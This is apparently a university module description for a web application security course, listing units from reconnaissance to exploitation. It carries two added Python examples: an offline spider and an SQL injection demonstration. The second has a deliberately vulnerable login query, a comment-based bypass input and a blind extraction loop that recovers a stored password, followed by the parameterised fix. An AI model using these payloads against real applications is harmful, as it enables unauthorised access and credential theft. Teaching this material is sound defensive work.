Module Overview

Application Security

Develop the essential skills required to assess web application security and to apply an appropriate solution where necessary. Gain an insight into the processes and models underpinning development of secure web applications. Investigate best practices in the adoption of secure web application practices.

Module Code

DFCS H4013

ECTS Credits

10

*Curricular information is subject to change

Introduction and Overview

Definition, web application security scenario, common security mistakes, why security mistakes are made, the need for securing web applications, types of security vulnerabilities.

Reconnaissance and Mapping

Discover the infrastructure behind the application. Identify the hosts and operating systems. SSL/TLS configuration and its weaknesses. Explore virtual hosting and its impact on testing. Learn methods to identify load balancers. Software configuration discovery. Explore external information sources. Google hacking. Using tools to spider a web site. Scripting to automate web requests and spidering. Application flow charting. Relationship analysis within an application. JavaScript for the attacker.
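As an added example (not part of the module description), the script below automates web requests and builds an application flow chart of the kind this unit covers: it spiders a site breadth-first, stays on the starting host, records which page links where, and lists each form with its input names as an entry point for later testing. The site, the host name app.example and the fetch() function are constructed stand-ins for HTTP responses so the script runs offline; swap fetch() for a real HTTP client only against targets you are authorised to test.

```python
"""Minimal spider / flow-charting script (added example, constructed data)."""

from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse, urldefrag

# Constructed sample site: URL -> HTML body, standing in for HTTP GET responses.
# The host name app.example is an assumption for the example.
SITE = {
    "http://app.example/": '<a href="/login">Login</a> <a href="/about">About</a>'
                           '<a href="http://cdn.example/x.js">ext</a>',
    "http://app.example/login": '<form action="/login" method="post">'
                                '<input name="user"><input name="pass" type="password"></form>',
    "http://app.example/about": '<a href="/">Home</a><a href="/about#team">Team</a>',
    "http://app.example/admin": "<p>hidden</p>",  # never linked: spidering alone will not find it
}


class LinkParser(HTMLParser):
    """Collect href targets and form actions (with input names) from one page."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.forms = []   # entries are [action, method, [input names]]
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "form":
            self._form = [a.get("action") or "", (a.get("method") or "get").lower(), []]
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("name"):
            self._form[2].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def fetch(url):
    """Stand-in for an HTTP GET against the constructed site; None means 404."""
    return SITE.get(url)


def spider(start, fetch=fetch, max_pages=100):
    """Breadth-first crawl restricted to the start host.

    Returns (flow, external): flow maps each crawled URL to its on-host links
    and its forms as (absolute action, method, [inputs]); external is the set
    of off-host references seen, which is useful for spotting CDNs and
    third-party hosts without crawling them."""
    host = urlparse(start).netloc
    queue, seen, flow, external = deque([start]), {start}, {}, set()
    while queue and len(flow) < max_pages:
        url = queue.popleft()
        body = fetch(url)
        if body is None:
            continue
        parser = LinkParser()
        parser.feed(body)
        flow[url] = {"links": [], "forms": []}
        for href in parser.links:
            target = urldefrag(urljoin(url, href)).url  # resolve relative URLs, drop #fragments
            if urlparse(target).netloc != host:
                external.add(target)
                continue
            flow[url]["links"].append(target)
            if target not in seen:
                seen.add(target)
                queue.append(target)
        for action, method, inputs in parser.forms:
            flow[url]["forms"].append((urljoin(url, action), method, inputs))
    return flow, external


if __name__ == "__main__":
    flow, external = spider("http://app.example/")
    for page, info in flow.items():
        print(page, "->", info["links"], info["forms"])
    print("external:", sorted(external))
```

Note what the result does not contain: /admin is present on the constructed site but never linked, so a spider alone misses it. That is why the unit pairs spidering with external information sources and configuration discovery.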

Server Side Discovery

Learn methods to discover various vulnerabilities. Information leakage. Username harvesting. Command injection. SQL injection. Blind SQL injection. Cross-Site Scripting (XSS). Cross-Site Request Forgery. Session issues. Explore differences between data back-ends. Explore fuzzing and various fuzzing tools. Understand methods for attacking web services.
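As an added example (not part of the module description), the code below shows two of the topics in this unit side by side: a login query built by string concatenation, the authentication bypass it permits, a boolean-based blind SQL injection that recovers a stored value one character at a time when the application reveals only success or failure, and the parameterised query that closes the hole. The database, table and user rows are constructed in memory with SQLite; other back-ends differ in comment syntax and string functions, which is the "differences between data back-ends" point.

```python
"""SQL injection, blind extraction and the parameterised fix (added example)."""

import sqlite3

# Constructed in-memory database standing in for the application's back-end.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, pw TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('bob', 'hunter2')")


def login_vulnerable(user, pw):
    """Deliberately vulnerable: user input is spliced into the SQL text, so
    quotes and comment markers in it become SQL syntax."""
    sql = f"SELECT name FROM users WHERE name = '{user}' AND pw = '{pw}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(user, pw):
    """Same query with bound parameters: the driver sends input as data,
    so it can never change the statement's structure."""
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND pw = ?", (user, pw)
    ).fetchone()
    return row[0] if row else None


def blind_extract(user, max_len=32):
    """Boolean-based blind SQLi against login_vulnerable().

    The caller only learns whether the login succeeded, so each probe asks a
    yes/no question: 'is character <pos> of this user's pw equal to <code>?'
    The injected text `x' OR name='<user>' AND unicode(substr(pw,pos,1))=code --`
    makes the row match exactly when the guess is right; `--` comments out the
    original password check. substr() past the end returns '' and unicode('')
    is NULL, so no code matches and the loop stops."""
    recovered = ""
    for pos in range(1, max_len + 1):
        found = False
        for code in range(32, 127):  # printable ASCII; ~95 requests per character
            probe = f"x' OR name='{user}' AND unicode(substr(pw,{pos},1))={code} --"
            if login_vulnerable(probe, "") is not None:
                recovered += chr(code)
                found = True
                break
        if not found:
            break
    return recovered


if __name__ == "__main__":
    # Classic bypass: the comment marker removes the password check entirely.
    print("bypass  :", login_vulnerable("admin' --", ""))      # admin
    print("safe    :", login_safe("admin' --", ""))            # None
    # The same flaw leaks the stored value even though only true/false is visible.
    print("blind   :", blind_extract("admin"))                 # S3cret!
```

The blind loop is linear in alphabet size per character; real tooling halves that with binary search on the code point, but the principle, one boolean oracle per request, is unchanged. The fix is not input filtering but login_safe(): bound parameters plus, in a real application, hashed rather than plaintext passwords so that even a successful extraction yields nothing directly usable.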

Client Side Discovery

Learn methods to discover various vulnerabilities. Information leakage. Username harvesting. Command injection. SQL injection. Blind SQL injection. Cross-Site Scripting (XSS). Cross-Site Request Forgery. Methods to decompile client-side code. Flash. Java. Explore malicious applets and objects. Discover vulnerabilities in web applications through their client components. Understand methods for attacking web services. Understand methods for testing Web 2.0 and AJAX-based sites. AJAX and web services. The attacker's perspective on Python and PHP. The ability to extend the tools we are using.

Exploiting

internal networks. Explore attack frameworks. AttackAPI. BeEF. XSS-Proxy. Walk through an entire attack scenario. Exploit the various vulnerabilities discovered. Leverage the attacks to gain access to the system. Learn how to pivot our attacks through a web application. Understand methods of interacting with a server through SQL injection. Exploit applications to steal cookies. Execute commands through web application vulnerabilities.

Module Content & Assessment

Assessment Breakdown

Other Assessment(s): 100%